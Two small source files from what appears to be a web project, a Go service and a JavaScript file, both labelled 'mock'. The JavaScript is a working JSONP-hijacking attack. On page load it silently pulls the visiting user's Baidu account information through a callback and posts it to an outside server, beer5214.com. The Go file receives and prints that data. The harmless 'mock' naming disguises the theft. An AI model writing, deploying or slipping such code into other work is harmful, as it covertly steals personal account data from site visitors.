File: src/service/mock.go
package service

import "fmt"

type Mock struct {
}

type MockModel struct {
	Source string `json:"source"`
	Data   string `json:"data"`
}

func (m Mock) InsertMock(model MockModel) {
	fmt.Println(model)
	fmt.Println(model.Data)
	fmt.Println(model.Source)
}

File: js/mock.js
function addScriptTag(src) {
    var script = document.createElement('script');
    script.setAttribute("type", "text/javascript");
    script.src = src;
    document.body.appendChild(script);
}

window.onload = function () {
    if (window.location.href.endsWith('.com/')) {
        addScriptTag('https://yuedu.baidu.com/nauser/getyduserinfo?na_uncheck=1&opid=wk_na&callback=bd');
    }

}

function bd(data) {
    axios.post('https://www.beer5214.com/api/mock', {
        'source': 'baidu',
        'data': JSON.stringify(data)
    }).then(function (result) {
        console.log(result);
    })
}